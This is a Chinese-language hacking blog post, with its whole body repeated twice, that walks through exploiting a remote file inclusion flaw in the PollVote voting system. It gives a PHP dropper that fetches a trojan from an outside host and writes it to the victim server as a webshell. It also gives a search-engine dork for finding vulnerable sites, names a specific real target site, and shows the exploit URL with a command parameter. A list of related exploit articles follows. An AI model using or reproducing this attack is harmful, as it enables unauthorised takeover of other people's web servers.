PollVote投票系统漏洞利用
2007-01-16 00:00
495 查看
PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法,
不过作者说利用过程的时候很烦琐,关键的时候又没说明白,
简单的说一下``
首先建立2个文本 分别是creatfile.txt和phpdoor.txt
creatfile.txt内容写
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt内容就写个PHP木马
之后在http://www.google.com 搜索关键词"pollvote.php?pollname"
有很多,
搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
这个就是利用原理了,
刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里
执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
这样
phpdoor.txt里的内容就会生成一个111.php
这样我们就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
不过作者说利用过程的时候很烦琐,关键的时候又没说明白,
简单的说一下``
首先建立2个文本 分别是creatfile.txt和phpdoor.txt
creatfile.txt内容写
<?
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");
$ff=fopen("111.php","a");
fwrite ($ff,$f);
fclose($ff);
?>
phpdoor.txt内容就写个PHP木马
之后在http://www.google.com 搜索关键词"pollvote.php?pollname"
有很多,
搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg
就是他了
EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls
这个就是利用原理了,
刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里
执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt
这样
phpdoor.txt里的内容就会生成一个111.php
这样我们就得到WEBSHELL了
http://www.skinnyturd.co.uk/poll/111.php
您可能感兴趣的文章:
相关文章推荐
- 防止利用系统漏洞轻轻松松绕过你的验证码的方法
- 信用卡存危险盗刷暗门:利用第三方支付系统漏洞
- 利用新云网站管理系统漏洞成功获取某大型书店Webshell
- 最新易想团购系统通杀SQL注入漏洞分析附利用exp
- 易想团购系统通杀SQL注入漏洞分析及利用
- Android中利用5.0系统屏幕录制UI漏洞骗取应用录制屏幕授权
- 利用OpenVAS快速打造漏洞评估系统 推荐
- thinksns V3(开源微博系统) getshell 漏洞附利用方法
- Android中利用5.0系统屏幕录制UI漏洞骗取应用录制屏幕授权
- 由0day漏洞看利用系统漏洞攻击。
- PHP168 V6.02 整站系统远程执行任意代码漏洞利用
- 冷迪小说系统漏洞利用工具.php
- 有学生提到,在大学选课的时候,可以写一个“刷课机”的程序,利用学校选课系统的弱点或漏洞,帮助某些人选到某些课程。或者帮助用户刷购票网站,先买到火车票。这些软件合法么?符合道德规范么?是在“软件工程”的研究范围么?
- 利用Jmeter对简易投票系统进行刷票的实践
- Android中利用5.0系统屏幕录制UI漏洞骗取应用录制屏幕授权
- 网络攻防实战:老Y文章管理系统V2.2注入漏洞分析与利用
- ISF:一款基于Python的工控系统漏洞利用框架
- 利用Ossim系统进行主机漏洞扫描
- 如何利用unicode漏洞和net dde漏洞夺取系统管理员权限
- 被利用较多的系统漏洞及补丁收集